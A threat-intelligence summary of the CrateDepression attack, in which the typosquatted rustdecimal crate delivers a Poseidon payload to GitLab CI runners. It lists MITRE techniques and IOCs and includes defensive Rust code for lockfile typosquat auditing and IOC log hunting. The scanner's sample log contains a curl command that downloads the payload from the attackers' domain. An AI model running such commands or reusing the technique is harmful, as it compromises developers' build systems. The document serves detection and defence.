CrateDepression is a software supply-chain attack on Rust developers and GitLab CI pipelines: a typosquatted crate, rustdecimal (mimicking rust_decimal), carries a downloader that stages a second-stage Go payload built on the Mythic framework's Poseidon agent. By infecting cloud-based CI environments and impersonating a known Rust developer to seed tainted source code, the campaign positions itself for larger-scale supply-chain intrusions. #CrateDepression #rustdecimal #GitLabCI #Poseidon #Mythic #cratesio
Keypoints
- CrateDepression targets the Rust community with a malicious rustdecimal crate that typosquats the legitimate rust_decimal package.
- The malicious code probes for the GITLAB_CI environment variable; the infection chain proceeds only on hosts where it is set, so the crate behaves innocuously outside GitLab CI pipelines.
- On hosts that pass that check, a second-stage payload written in Go is downloaded and executed: Poseidon, the Go agent for the Mythic post-exploitation framework.
- The campaign is built to enable broader supply-chain attacks, using infected GitLab CI pipelines as the path to downstream targets.
- The attackers impersonate a known Rust developer to poison the well, seeding source code that pulls in the malicious crate so that downstream projects compromise themselves by building it.
- The second-stage payload beacons to the C2 domain api.kakn.li and exposes Poseidon's tasking (persistence, keylogging, screen capture, and more) on Linux and macOS.
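The lookalike check that catches this kind of crate can be automated against a lockfile. The following is an added example, not code from the report or from crates.io tooling: it parses a constructed Cargo.lock excerpt with the standard library only, normalizes crate names the way crates.io treats "-" and "_" as interchangeable, and flags any dependency that matches a popular crate after normalization or sits within one edit of one. The POPULAR_CRATES allowlist and the lockfile contents are assumptions made for the demo.

```rust
// Added example, not from the SentinelLabs report or crates.io tooling: a
// std-only Cargo.lock audit that flags dependencies whose name matches a
// popular crate once "-"/"_" are ignored, or sits within one edit of one.
// That is the lookalike pattern CrateDepression used (rustdecimal vs.
// rust_decimal).
use std::collections::HashSet;

/// One `[[package]]` entry from Cargo.lock.
#[derive(Debug, Clone, PartialEq)]
pub struct LockedPackage { pub name: String, pub version: String }

/// A locked dependency that resembles a popular crate without being it.
#[derive(Debug, Clone, PartialEq)]
pub struct Finding { pub package: LockedPackage, pub lookalike_of: String, pub reason: String }

/// Assumed allowlist; a real audit would derive it from download counts.
pub const POPULAR_CRATES: &[&str] = &["rust_decimal", "serde", "tokio", "rand"];

/// Constructed lockfile excerpt for the demo (versions other than the
/// malicious rustdecimal 1.23.0 are made up).
pub const SAMPLE_LOCK: &str = r#"# This file is automatically @generated by Cargo.
version = 3

[[package]]
name = "rust_decimal"
version = "1.23.1"
source = "registry+https://github.com/rust-lang/crates.io-index"

[[package]]
name = "rustdecimal"
version = "1.23.0"
source = "registry+https://github.com/rust-lang/crates.io-index"

[[package]]
name = "serde"
version = "1.0.137"
source = "registry+https://github.com/rust-lang/crates.io-index"
"#;

/// Line-oriented parse: each `[[package]]` block has `name = "..."` and
/// `version = "..."`; `source`, `checksum` and `dependencies` are ignored.
pub fn parse_cargo_lock(text: &str) -> Vec<LockedPackage> {
    fn push(out: &mut Vec<LockedPackage>, name: Option<String>, version: Option<String>) {
        if let (Some(name), Some(version)) = (name, version) {
            out.push(LockedPackage { name, version });
        }
    }
    let mut packages = Vec::new();
    let (mut name, mut version) = (None, None);
    for line in text.lines().map(str::trim) {
        if line == "[[package]]" {
            push(&mut packages, name.take(), version.take());
        } else if let Some(v) = line.strip_prefix("name = ") {
            name = Some(v.trim_matches('"').to_string());
        } else if let Some(v) = line.strip_prefix("version = ") {
            version = Some(v.trim_matches('"').to_string());
        }
    }
    push(&mut packages, name.take(), version.take());
    packages
}

/// crates.io treats "-" and "_" as interchangeable and typosquats often just
/// drop the separator, so compare names with separators removed.
pub fn normalize(name: &str) -> String {
    name.chars().filter(|c| !matches!(*c, '-' | '_')).map(|c| c.to_ascii_lowercase()).collect()
}

/// Classic Levenshtein distance (insert, delete, substitute each cost 1).
pub fn edit_distance(a: &str, b: &str) -> usize {
    let (a, b): (Vec<char>, Vec<char>) = (a.chars().collect(), b.chars().collect());
    let mut prev: Vec<usize> = (0..=b.len()).collect();
    let mut cur = vec![0usize; b.len() + 1];
    for i in 1..=a.len() {
        cur[0] = i;
        for j in 1..=b.len() {
            let cost = usize::from(a[i - 1] != b[j - 1]);
            cur[j] = (prev[j] + 1).min(cur[j - 1] + 1).min(prev[j - 1] + cost);
        }
        std::mem::swap(&mut prev, &mut cur);
    }
    prev[b.len()]
}

/// Flag packages that are not a popular crate but look like one. Names under
/// four characters skip the edit-distance test, which is too noisy for them.
pub fn audit(packages: &[LockedPackage], popular: &[&str]) -> Vec<Finding> {
    let known: HashSet<&str> = popular.iter().copied().collect();
    let mut findings = Vec::new();
    for pkg in packages.iter().filter(|p| !known.contains(p.name.as_str())) {
        for &candidate in popular {
            let reason = if normalize(&pkg.name) == normalize(candidate) {
                "identical once '-' and '_' are removed"
            } else if pkg.name.len() >= 4 && edit_distance(&pkg.name, candidate) <= 1 {
                "within one edit of a popular crate"
            } else {
                continue;
            };
            findings.push(Finding { package: pkg.clone(), lookalike_of: candidate.into(), reason: reason.into() });
            break;
        }
    }
    findings
}

fn main() {
    for f in audit(&parse_cargo_lock(SAMPLE_LOCK), POPULAR_CRATES) {
        println!("SUSPICIOUS {} {}: looks like {} ({})", f.package.name, f.package.version, f.lookalike_of, f.reason);
    }
}
```

Every finding still needs human triage: a legitimate fork or a deliberately similar name will trip the same heuristics, so the output is a review queue, not a block decision. A CI job that runs this against the committed Cargo.lock and fails on unreviewed findings is one cheap control against exactly the seeding step described above.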
MITRE Techniques
- [T1195.001] Supply Chain Compromise: Compromise Software Dependencies and Development Tools – A malicious crate typosquatting rust_decimal, combined with impersonation of a known Rust developer to poison the well; “The malicious dependency checks for environment variables that suggest a singular interest in GitLab Continuous Integration (CI) pipelines.”
- [T1036] Masquerading – Impersonation of a known Rust developer to poison the well with source code that relies on the typosquatted malicious dependency; “impersonation of a known Rust developer to poison the well with source code that relies on the typosquatted malicious dependency and sets off the infection chain.”
- [T1027] Obfuscated Files or Information – The code is lightly obfuscated with a five-byte XOR key; “a five byte XOR key.”
- [T1105] Ingress Tool Transfer – The downloader uses curl to fetch the payload and save it to /tmp/git-updater.bin; “uses a curl request to download the payload and save it to /tmp/git-updater.bin.”
- [T1543.001] Create or Modify System Process: Launch Agent / [T1543.004] Launch Daemon – macOS persistence via a LaunchAgent or LaunchDaemon; the LoginItem option maps to [T1547.015] Boot or Logon Autostart Execution: Login Items; “persist by either or both of a LaunchAgent/Daemon and a LoginItem.”
- [T1071.001] Web Protocols – The second-stage payload initiates communication with a C2 (https://api.kakn.li) and supports tasking; “profile.Start() then initiates communication with the C2” and “The payload contains a switch with a large array of tasking options… https://api.kakn[.]li.”
Indicators of Compromise
- [Domain] api.kakn.li – C2 domain used by the Poseidon payload for tasking and control
- [IP] 64.227.12.57 – IP address that api.kakn.li resolves to for C2 communications
- [Domain] githubio.codes – hosting domain referenced by the downloader URLs used in the infection chain
- [Filename] rustdecimal-1.22.0.crate.tar.gz – malicious crate archive, version 1.22.0
- [Filename] rustdecimal-1.23.0.crate.tar.gz – malicious crate archive, version 1.23.0
- [Filename] README.bin – Mach-O (macOS) second-stage Poseidon payload, fetched from the hosting domain
- [Filename] READMEv2.bin – ELF (Linux) second-stage Poseidon payload
- [Path] /tmp/git-updater.bin – location where the downloader writes the fetched payload before executing it
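To hunt for these indicators across CI runner telemetry, the following added example (not tooling from the report) re-fangs defanged IOCs and matches each indicator as a whole token against constructed DNS, proxy and shell-history lines, so that a longer IP such as 164.227.12.57, or the crate archive name, does not produce a false hit on the bare IP or bare crate name. The log lines are constructed for the demo; the /tmp/git-updater.bin path comes from the downloader description in the MITRE section.

```rust
// Added example, not from the report: match the CrateDepression IOCs above
// against log lines (DNS, proxy, shell history) with token-boundary checks
// so "164.227.12.57" does not hit on the C2 IP. Defanged "[.]" / "hxxp"
// forms are re-fanged before matching. The log lines are constructed.

/// Indicator, and the IOC category it belongs to.
pub const INDICATORS: &[(&str, &str)] = &[
    ("api.kakn.li", "domain"),
    ("githubio.codes", "domain"),
    ("64.227.12.57", "ip"),
    ("rustdecimal", "crate name"),
    ("rustdecimal-1.22.0.crate.tar.gz", "filename"),
    ("rustdecimal-1.23.0.crate.tar.gz", "filename"),
    ("README.bin", "filename"),
    ("READMEv2.bin", "filename"),
    ("/tmp/git-updater.bin", "path"),
];

/// Constructed sample telemetry (not real logs).
pub const SAMPLE_LOG: &[&str] = &[
    "2022-05-11T10:01:58Z runner-7 sh: curl -s https://githubio.codes/README.bin -o /tmp/git-updater.bin",
    "2022-05-11T10:02:13Z runner-7 dns: query A api.kakn[.]li",
    "2022-05-11T10:02:14Z proxy: CONNECT 64.227.12.57:443 user=gitlab-runner",
    "2022-05-11T09:59:30Z runner-7 cargo: Downloaded rustdecimal v1.23.0",
    "2022-05-11T10:03:00Z runner-7 dns: query A crates.io",
    "2022-05-11T10:03:05Z proxy: CONNECT 164.227.12.57:443 user=ci",
];

#[derive(Debug, Clone, PartialEq)]
pub struct Hit { pub line_no: usize, pub indicator: &'static str, pub kind: &'static str }

/// Undo common defanging so analyst-pasted IOCs and raw telemetry match alike.
pub fn refang(s: &str) -> String {
    s.replace("[.]", ".").replace("[:]", ":").replace("hxxp", "http")
}

fn is_name_char(b: u8) -> bool {
    b.is_ascii_alphanumeric() || matches!(b, b'.' | b'-' | b'_')
}

/// True if `needle` occurs in `line` as a whole token: the bytes on either
/// side must not extend the name (no "164.227.12.57" hitting "64.227.12.57",
/// no "rustdecimal-1.23.0..." double-counting as the bare crate name).
pub fn contains_token(line: &str, needle: &str) -> bool {
    if needle.is_empty() { return false; }
    let bytes = line.as_bytes();
    let mut from = 0;
    while let Some(pos) = line[from..].find(needle) {
        let (start, end) = (from + pos, from + pos + needle.len());
        let before_ok = start == 0 || !is_name_char(bytes[start - 1]);
        let after_ok = end == bytes.len() || !is_name_char(bytes[end]);
        if before_ok && after_ok { return true; }
        from = start + 1; // indicators are ASCII, so this stays on a char boundary
    }
    false
}

/// Scan each line for every indicator; one Hit per (line, indicator) pair.
pub fn scan_lines(lines: &[&str]) -> Vec<Hit> {
    let mut hits = Vec::new();
    for (i, raw) in lines.iter().enumerate() {
        let line = refang(raw);
        for &(indicator, kind) in INDICATORS {
            if contains_token(&line, indicator) {
                hits.push(Hit { line_no: i + 1, indicator, kind });
            }
        }
    }
    hits
}

fn main() {
    for h in scan_lines(SAMPLE_LOG) {
        println!("line {}: {} {} -> {}", h.line_no, h.kind, h.indicator, SAMPLE_LOG[h.line_no - 1]);
    }
}
```

Run it over real runner logs by replacing SAMPLE_LOG with lines from your collector. Treat a hit on the bare crate name alone as lower confidence than a hit on the C2 domain, the IP, or the /tmp/git-updater.bin path, which are specific to this infection chain.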